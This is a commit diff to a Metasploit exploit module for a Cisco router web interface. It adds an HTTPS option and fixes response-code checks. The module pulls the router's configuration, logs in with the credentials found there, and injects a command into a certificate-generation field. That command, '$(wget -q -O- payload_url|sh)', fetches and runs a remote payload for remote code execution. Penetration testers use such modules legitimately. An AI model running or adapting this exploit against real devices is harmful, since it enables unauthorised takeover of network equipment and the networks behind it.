Checked the functionality of module. Added ability to connect via HTTPS.
parent
0551f3df3c
commit
1e00c28701
|
@ -58,8 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
register_options([
|
||||
Opt::RPORT(8007), # port of Cisco webinterface
|
||||
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
|
||||
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
|
||||
])
|
||||
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
@ -79,13 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def primer
|
||||
payload_url = get_uri
|
||||
print_status("Downloading configuration from #{peer}")
|
||||
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
|
||||
if(datastore['USE_SSL'])
|
||||
print_status("Using SSL connection to router.")
|
||||
end
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("cgi-bin","config.exp"),
|
||||
'SSL' => datastore['USE_SSL']
|
||||
})
|
||||
unless res
|
||||
vprint_error('Connection failed.')
|
||||
return nil
|
||||
end
|
||||
|
||||
unless res.status == 200
|
||||
unless res.code == 200
|
||||
vprint_error('Could not download config. Aborting.')
|
||||
return nil
|
||||
end
|
||||
|
@ -99,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status("Using default auth_key #{authkey}")
|
||||
res2 = send_request_cgi({
|
||||
'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
|
||||
'SSL' => datastore['USE_SSL'],
|
||||
'method' => 'POST',
|
||||
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch¤t_password=&new_password=&re_new_password="
|
||||
})
|
||||
|
@ -108,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return nil
|
||||
end
|
||||
|
||||
unless res.status == 200
|
||||
unless res.code == 200
|
||||
vprint_error('Login failed with downloaded credentials. Aborting.')
|
||||
return nil
|
||||
end
|
||||
|
@ -120,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status("Sending payload. Staging via #{payload_url}.")
|
||||
#Build staging command
|
||||
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
|
||||
if(command_string.length <= 50)
|
||||
if(command_string.length <= 63)
|
||||
print_status("Staging command length looks good. Sending exploit!")
|
||||
else
|
||||
vprint_error("Warning: Staging command length probably too long. Trying anyway...")
|
||||
|
@ -128,31 +137,32 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
res3 = send_request_cgi({
|
||||
'uri' => normalize_uri("certificate_handle2.htm"),
|
||||
'SSL' => datastore['USE_SSL'],
|
||||
'method' => 'POST',
|
||||
'cookie' => cookies,
|
||||
'vars_get' => {
|
||||
'type' => '4',
|
||||
},
|
||||
'vars_post' => {
|
||||
'page' => 'self_generator.htm',
|
||||
'totalRules' => '1',
|
||||
'OpenVPNRules' => '30',
|
||||
'submitStatus' => '1',
|
||||
'log_ch' => '1',
|
||||
'type' => '4',
|
||||
'Country' => 'US',
|
||||
'state' => 'CA',
|
||||
'locality' => 'DC',
|
||||
'organization' => 'cc',
|
||||
'organization_unit' => 'A',
|
||||
'email' => 'any@example.com',
|
||||
'KeySize' => '512',
|
||||
'KeyLength' => '1024',
|
||||
'valid_days' => '30',
|
||||
'SelectSubject_c' => '1',
|
||||
'SelectSubject_s' => '1'
|
||||
},
|
||||
'data' => "common_name=#{command_string}"
|
||||
'vars_get' => {
|
||||
'type' => '4',
|
||||
},
|
||||
'vars_post' => {
|
||||
'page' => 'self_generator.htm',
|
||||
'totalRules' => '1',
|
||||
'OpenVPNRules' => '30',
|
||||
'submitStatus' => '1',
|
||||
'log_ch' => '1',
|
||||
'type' => '4',
|
||||
'Country' => 'A',
|
||||
'state' => 'A',
|
||||
'locality' => 'A',
|
||||
'organization' => 'A',
|
||||
'organization_unit' => 'A',
|
||||
'email' => 'any@example.com',
|
||||
'KeySize' => '512',
|
||||
'KeyLength' => '1024',
|
||||
'valid_days' => '30',
|
||||
'SelectSubject_c' => '1',
|
||||
'SelectSubject_s' => '1'
|
||||
},
|
||||
'data' => "common_name=#{command_string}"
|
||||
})
|
||||
unless res3
|
||||
vprint_error('Connection failed while sending command. Aborting.')
|
||||
|
|
Loading…
Reference in New Issue